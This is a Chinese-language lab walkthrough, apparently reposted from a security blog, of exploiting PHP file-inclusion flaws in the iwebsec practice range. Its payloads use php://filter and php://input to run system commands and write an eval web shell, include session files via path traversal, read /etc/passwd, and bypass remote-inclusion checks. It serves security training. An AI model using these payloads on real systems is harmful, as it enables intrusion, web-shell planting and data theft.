文章总结： 本文档详细记录iwebsec靶场中文件上传与文件包含漏洞的实战渗透过程。文件上传部分展示6种绕过技术：Content-Type过滤绕过、前端JS验证绕过、文件名大小写变异、文件头伪装、%00截断利用及.htaccess解析控制。文件包含部分涵盖php://filter/input协议利用、Session文件包含、敏感路径读取及远程包含绕过。通过蚁剑连接验证漏洞利用效果，提供完整的Web安全渗透测试方法。 综合评分： 75 文章分类： 渗透测试,WEB安全,实战经验,漏洞分析,安全工具

蚁剑连接

文件包含

1、php伪协议

（一）php://filter

2、打开hackbar

http://47.239.1.88/fi/06.php?filename=php://filter/resource=02_exp.md

发现txt文件中的php代码被执行。

得到了06.php的源码的base64编码。

http://47.239.1.88/fi/06.php?filename=php://filter/convert.base64-encode/resource=06.php

点击【BASE64】向左的按钮，将得到的base64编码复制到弹窗里并点击【确定】进行解码。这样就得到了06.php的php源码。

（二）php://input

（1）利用方式一：php://input（读取POST数据）

http://47.239.1.88/fi/08.php?filename=php://input

（2）利用方式二：php://input（命令执行）

尝试输入一句话php代码：<?php system(‘whoami’);?>。发现成功执行了系统命令。

（3）利用方式三：php://input（写入木马）

<?php fputs(fopen('123.txt', 'w'), '<?php @eval($\_POST[cmd])?>‘);?>

在url里包含刚才传入的恶意文件

文件存在

蚁剑连接

2、Session文件包含

根据提示信息，在url里输入该参数查看结果。

?iwebsec=iwebsec

?iwebsec=<>?

?iwebsec=<?php phpinfo();?>

f12再次访问页面，cookies值。展开可以看到PHPSESSID的值。

结合文件上传漏洞上传phpinfo的文件

http://47.239.1.88/fi/01.php?filename=../../../../../var/lib/php/session/sess_0arp7clpviq2tof0n7gkdltnr1

3、常见的敏感信息路径实验

/fi/01.php?filename=test.txt。

将test.txt解析成了php文件。

/fi/01.php?filename=/etc/passwd。

4、无限制远程文件包含

fi/04.php?filename=http://127.0.0.1/fi/test.txt。

5、有限制远程文件包含

（1）#号绕过

fi/05.php?filename=http://127.0.0.1/fi/test.txt%23

（2）?(问号)绕过

fi/05.php?filename=http://127.0.0.1/fi/test.txt?

如有侵权，请联系删除。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：熵减花园 《iwebsec靶场，文件上传+文件包含》